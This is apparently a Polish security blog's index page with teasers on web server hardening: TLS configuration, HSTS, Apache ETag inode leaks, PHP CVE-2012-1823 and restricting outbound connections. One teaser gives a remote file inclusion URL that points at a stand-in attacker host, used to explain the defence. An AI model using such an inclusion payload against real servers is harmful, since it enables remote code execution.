Z

a pomocą HTTPsrvREAPER (uruchomionego w pięciu wątkach) oraz pracującego dzień i noc Raspberry Pi udało się przeskanować przeanalizować w czasie od sierpnia 2014 r. do kwietnia 2015 r. sieci z zakresu: 1.0.0.0/8 – 5.0.0.0/8. Razem powstało 1.312.618 wpisów zawierających informacje o używanej (bądź nie – Undefined) wersji oprogramowania serwera httpd przez dany adres IP.
[ czytaj całość… ]

P

oniższa konfiguracja serwera nginx dla komunikacji po https pozwala na uzyskanie oceny A+ w teście przeprowadzanym przez firmę Qualys SSL Labs. Ponadto zaspokaja wymagania PCI Compliance oraz FIPS, a także broni przed atakami typu: BEAST, Heartbleed czy POODLE. Innymi mechanizmami, które zostały zwarte to: HSTS, OSCP oraz SPDY. Stosując poniższą konfigurację należy liczyć się, że może ona nie działać (lub niektóre jej funkcjonalności) z starszymi przeglądarkami i aplikacjami typu: IE6, czy Java 6.
[ czytaj całość… ]

G

dybym miał na dzisiejszy dzień zapewnić podstawowy poziom bezpieczeństwa swojego serwera WWW – po standardowej instalacji z paczki zacząłbym od kilku rzeczy:
[ czytaj całość… ]

J

eśli używamy serwera Apache możemy wykorzystać w jego komunikacji z przeglądarką ETagi (ang. Entity Tag) dla statycznych zasobów serwowanych z dysku naszego serwera. Służą one między innymi serwerowi Apache do porównywania ich wartości z nagłówkiem If-None-Match i zwracania w zależności od wyniku kodu: 304 Not modified lub 200 OK. Niestety od wersji 1.3.22 do 2.3.14 tego serwera w konstrukcji pola ETag używany jest numer i-node pliku, do którego zostało wykonane odwołanie.
[ czytaj całość… ]

W

maju 2012 roku opublikowano lukę w PHP CVE-2012-1823. Dotyczy ona tylko serwerów, które posiadają skonfigurowaną obsługę języka PHP jako skrypty CGI. Chociaż nie jest to domyślna konfiguracja w większości systemów – w takich dystrybucjach jak Debian i Ubuntu instalując paczkę php5-cgi i zostawiając domyślne ustawienia serwera Apache – pozwalające na dostępność binarnych plików w ścieżce http://serwer/cgi-bin/php5 wystawiamy nasz serwer na eksplorację luki. O zasadzie luki możemy przeczytać tutaj.
[ czytaj całość… ]

S

erwer WWW głównie akceptuje połączenia przychodzące od użytkowników, a sam niekiedy potrzebuje nawiązać nowe połączenia z zewnętrznymi zasobami np. bazą danych. Dlatego dobrze znając architekturę aplikacji – warto ograniczyć jej połączenia wychodzące tylko do tych, które są jej rzeczywiście niezbędne. To sprawia, że tak wyprofilowana sieciowo aplikacja staje się trudniejsza do zdobycia na przykład przez atakującego, który chce wykorzystać atak z wykorzystaniem zewnętrznych zasobów:

/podatny_kod.php?bug=http://evilhacker.net/exploit?

[ czytaj całość… ]

P

owszechną praktyką wśród programistów piszących własne webaplikacje oraz webowych frameworków odkrywających koło od nowa jest poleganie na wartościach zwracanych w nagłówku HTTP Host. Jest to bardzo wygodny sposób na gwarancję, że ta sama aplikacja zostanie uruchomiona na localhoście, serwerach środowiska: developerskiego, testowego, produkcyjnego, innych domenach i subdomenach itd., bez wprowadzania modyfikacji w kod aplikacji. Prosty przykład w PHP:
[ czytaj całość… ]

P

oniższe reguły mod_rewrite pozwalają na przekierowanie całego ruchu HTTP na HTTPS na serwerach Apache utworzonych w ramach AWS EC2 – wykorzystując nagłówek X-Forwarded-Proto dostarczany przez Load Balancer:

  RewriteEngine On
  RewriteCond %{HTTP:X-FORWARDED-PROTO} !https [NC]
  RewriteCond %{REQUEST_URI} !^/status\.php
  RewriteRule ^/?(.*) https://domena.pl/$1 [R=301,L]

Gdzie URL http://domena.pl/status.php jest sprawdzana przez Health Checker w celu stwierdzenia, czy dany serwer WWW jest reponsywny – dlatego została wykluczona z przepisywania.

Więcej informacji: Elastic Load Balancing Concepts and Terminologies

D

o uruchomienia serwera Apache (za przykład posłuży system CentOS 6.x) potrzebne są nam „POSIX capabilities” (pakiet RPM libcap). Szczerze mówiąc sam mechanizm PCAP stanowi obszerny materiał – w tym wpisie zostanie przedstawiony tylko szczątkowo jako możliwość uniknięcia korzystania przez serwer httpd z praw administratora do nasłuchu na porcie 80. Ze względu na przypisywanie uprawnień PCAP plikom w postaci rozszerzonych atrybutów (ang. extended attributes) pierwszym krokiem jest modyfikacja binarnego pliku httpd:
[ czytaj całość… ]

H

TTP Strict Transport Security (HSTS) jest opcjonalnym mechanizmem zabezpieczeń, w którym serwer WWW oświadcza klientowi (np. przeglądarce internetowej), że komunikacja powinna odbywać się tylko po bezpiecznym połączeniu. Oświadczenie serwera WWW odbywa się poprzez zastosowanie specjalnego nagłówka odpowiedzi HTTP: „Strict-Transport-Security„. Klient obsługujący mechanizm HSTS otrzymując ten nagłówek będzie zapobiegał wszelkiej łączności poprzez protokół HTTP w określonej domenie i starał się, aby wszystkie połączenia odbywały się przez HTTPS.
[ czytaj całość… ]